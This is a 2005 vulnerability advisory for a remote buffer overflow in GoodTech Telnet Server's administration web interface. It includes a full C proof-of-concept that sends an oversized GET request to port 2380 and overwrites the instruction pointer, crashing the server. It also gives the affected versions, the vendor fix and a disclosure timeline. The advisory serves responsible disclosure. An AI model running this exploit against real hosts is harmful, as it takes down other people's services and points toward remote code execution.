|
|
|
|
| |
| GoodTech Telnet Server turns "a Windows NT/2000/XP/2003 system into a multi-user Telnet server". GoodTech's administration web server interface is vulnerable to a remote buffer overflow, allowing a malicious attacker to run arbitrary commands on a vulnerable machine. |
| |
Credit:
The information has been provided by Komrade.
The original article can be found at: http://unsecure.altervista.org/security/goodtechtelnet.htm
|
| |
Vulnerable Systems:
* GoodTech Telnet Server version 5.0.6 and prior
Immune Systems:
* GoodTech Telnet Server version 5.0.7 or newer
The GoodTech program runs an administration web server (default port 2380). By sending a a very long string (10040 bytes) suffixed by two newline characters, a remote attacker can trigger a buffer overflow vulnerability, overwriting the instruction pointer and giving the possibility to execute arbitrary code remotely in the LOCAL_SYSTEM context.
Proof of Concept Code:
/**********************************
GoodTech Telnet Server Buffer Overflow Crash POC
created by Komrade
e-mail: unsecure(at)altervista(dot)org
web: http://unsecure.altervista.org
Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
on a Windows XP Professional sp2 operating system.
This exploit connects to the Administration server of GoodTech Telnet Server
(default port 2380) and sends a very long string (10040 bytes).
After the exploit is sent the Telnet Server will crash, trying to access
to a bad memory address: 0xDEADCODE.
Usage: gtscrash.exe "IP address"
Options:
"IP address" The IP address of the computer running GoodTech Telnet Server
**********************************/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
int main(int argc, char **argv)
{
SOCKET sock;
struct sockaddr_in sock_addr;
WSADATA data;
WORD p;
p=MAKEWORD(2,0);
WSAStartup(p,&data);
int i, n, err;
unsigned char *mex;
char risp[4096];
printf("--------------------------------------------\r\n");
printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
printf("\t\t\tcreated by Komrade\r\n\r\n");
printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
printf("\t\tweb: http://unsecure.altervista.org\r\n");
printf("--------------------------------------------\r\n\r\n");
if (argc < 2){
printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
printf("Options:\r\n");
printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
exit(0);
}
mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);
sock = socket(AF_INET, SOCK_STREAM, 0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(2380); /* Administration web server port */
sock_addr.sin_addr.s_addr= inet_addr(argv[1]);
err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
if(err<0){
printf("Unable to connect() to %s\n", argv[1]);
exit(-1);
}
strcpy (mex, "GET /");
for(i = strlen(mex); i < 10032; i++)
mex[i]= 'a';
mex[i]=0;
strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
strcat(mex, "\r\n\r\n");
printf("Sending %d bytes.....\n\n", strlen(mex));
n=send(sock, mex , strlen(mex), 0);
n=recv(sock, risp, sizeof(risp), 0);
if (n < 0)
printf("GoodTech Telnet Server succesfully crashed!!\n");
else{
risp[n]=0;
printf("%s\n", risp);
}
closesocket(sock);
WSACleanup();
return 0;
}
The original proof of concept code can be found at: http://unsecure.altervista.org/security/gtscrash.c.txt
Vendor Status:
Vendor was notified on 14/03/2005. The vendor released a fix in the new version 5.0.7
See to download the new fixed version.
Disclosure Timeline:
11/03/2005 - Vulnerability found.
14/03/2005 - Vendor contacted.
15/03/2005 - Vendor reply.
15/03/2005 - Vulnerability fixed. A new version of GoodTech Telnet Server is now available at the vendor's website at: http://www.goodtechsys.com
|
|
|
|
|
|
|
